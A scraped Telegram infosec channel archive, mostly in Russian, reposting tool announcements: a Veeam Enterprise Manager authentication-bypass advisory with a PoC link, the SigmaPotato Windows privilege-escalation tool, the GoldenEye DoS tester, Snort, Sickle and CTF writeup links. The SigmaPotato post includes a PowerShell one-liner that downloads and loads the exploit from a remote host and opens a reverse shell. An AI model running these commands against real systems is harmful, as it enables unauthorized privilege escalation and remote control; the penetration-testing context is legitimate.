es
Feedback
Fsecurity | HH

Fsecurity | HH

Ir al canal en Telegram

Канал про ИБ Наш Discord: https://discord.gg/Eg8aDS7Hn7 Пожертвовать: > https://www.donationalerts.com/r/xackapb

Mostrar más
2 008
Suscriptores
-124 horas
+27 días
-1230 días
Archivo de publicaciones
Repost from APT
🖥 Veeam Enterprise Manager Authentication Bypass May 21st, Veeam published an advisory stating that all the versions BEFORE
🖥 Veeam Enterprise Manager Authentication Bypass May 21st, Veeam published an advisory stating that all the versions BEFORE Veeam Backup Enterprise Manager 12.1.2.172 is affected by an authentication bypass allowing an unauthenticated attacker to bypass the authentication and log in to the Veeam Backup Enterprise Manager web interface as any user. , the CVSS for this vulnerability is 9.8. 🔗 Source: https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/ 🔗 PoC: https://github.com/sinsinology/CVE-2024-29849 #veeam #authentication #bypass #cve

Repost from Pentest HaT
🏃 SigmaPotato 1.2.6 Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семей
🏃 SigmaPotato 1.2.6 Инструмент для повышения привилегий в 🏠 Windows системах основанный на эксплоитах "картофельного" семейства (в частности GodPotato) Напомню что для реализации необходимо чтобы УЗ обладала привилегией SeImpersonatePrivilege или SeAssignPrimaryTokenPrivilege Обычно присутствует у сервисных УЗ, например IIS, MSSQL и т.д. whoami /priv Из плюсов возможность запуска как с диска, так и из памяти, а также создание revshell'a Примеры: ./SigmaPotato.exe --revshell ip port
[System.Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData("http(s)://<ip_addr>/SigmaPotato.exe"))

[SigmaPotato]::Main(@("--revshell","ip","port"))
Windows 8/8.1 - Windows 11
Windows Server 2012 - Windows 2022
💻 Home 💻 Download #potato #lpe #windows #soft #sigmapotato ✈️ // Pentest HaT 🎩

open-appsec - это механизм безопасности машинного обучения, который превентивно и автоматически предотвращает угрозы для веб-приложений и API. Это репозиторий включает основной код и логику. 🔗Ссылка: https://github.com/openappsec/openappsec

HTB Sherlock: Constellation 🔗Ссылка: https://0xdf.gitlab.io/2024/06/05/htb-sherlock-constellation.html

GoldenEye — это инструмент тестирования DoS-атак HTTP. Этот инструмент можно использовать для проверки уязвимости сайта к атакам типа «отказ в обслуживании» (DoS). Можно открыть несколько параллельных подключений к URL-адресу, чтобы проверить, может ли веб-сервер быть скомпрометирован.
Установка:
sudo apt install goldeneye
🔗Ссылка: https://www.kali.org/tools/goldeneye/

Snort - это анализатор / регистратор пакетов на базе libpcap, который можно использовать в качестве облегченной системы обнаружения сетевых вторжений. Он поддерживает ведение журнала на основе правил и может выполнять поиск / сопоставление содержимого в дополнение к обнаружению множества других атак и зондов, таких как переполнение буфера, скрытое сканирование портов, CGI-атаки, SMB-зонды и многое другое. Snort обладает возможностью оповещения в режиме реального времени, при этом оповещения отправляются в системный журнал, отдельный файл “alert” или даже на компьютер с Windows через Samba. 🔗Ссылка: https://www.kali.org/tools/snort/

Repost from TaipanByte CTF
Всем привет! 😎 Мы добавили несколько райтапов на таски Codeby.games: 🗂Архиватор #web #easy 🔐Доступ запрещен #web #medium �
Всем привет! 😎 Мы добавили несколько райтапов на таски Codeby.games: 🗂Архиватор #web #easy 🔐Доступ запрещен #web #medium 💸Базовая авторизация 2 #web #medium 🦖Мистер Дино #web #easy 🍯Ханипот #web #easy 👩‍👩‍👦Семья #crypto #easy ㊙️Руны, руны, и ещё раз руны #crypto #medium 🪆Матрешка #forensic #easy #codeby #writeup

Repost from #memekatz
Жиза..
Жиза..

Sickle - это инструмент для разработки полезной нагрузки, изначально созданный для помощи в создании шеллкода, однако его можно использовать и для создания полезной нагрузки для других типов эксплойтов (недвоичных). Хотя текущие модули в основном предназначены для сборки, этот инструмент не ограничивается шеллкодом. 🔗Ссылка: https://www.kali.org/tools/sickle-tool/

Хочу также посоветовать: 1 - Наш discord сервер! Где можно пообщаться 👾 2 - Мой Github 🦑 Наш второй канал [Ximera-Chan]

vopono - это инструмент для запуска приложений через VPN-туннели через временные сетевые пространства имен. Это позволяет вам запускать только несколько приложений через разные VPN одновременно, сохраняя при этом ваше основное соединение в обычном режиме. 🔗Ссылка: https://www.kali.org/tools/vopono/

sticker.webp0.44 KB